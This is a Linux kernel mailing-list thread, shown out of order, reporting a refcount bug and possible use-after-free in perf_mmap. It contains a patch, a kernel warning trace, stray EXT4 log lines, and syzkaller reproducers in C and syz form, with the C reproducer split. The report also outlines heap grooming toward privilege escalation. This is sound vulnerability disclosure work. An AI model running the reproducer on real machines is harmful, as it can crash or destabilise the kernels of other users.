// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
On Sun, Feb 01, 2026 at 07:34:36PM +0800, Haocheng Yu wrote:
This indentation looks very odd, are you sure it is correct?
thanks,
greg k-h
From: Greg KH <gregkh@linuxfoundation.org>
Date: Sun, 1 Feb 2026 12:49:11 +0100
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
---------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer and then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering reference count saturation or a use-after-free (UAF). The immediate symptom is typically a kernel warning or a denial of service through a hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption is the more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to groom the heap so that the freed memory is reallocated with a controlled structure, potentially achieving local privilege escalation. This makes the issue critical on multi-user systems and in containerized environments where the perf_event interface is accessible.
Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
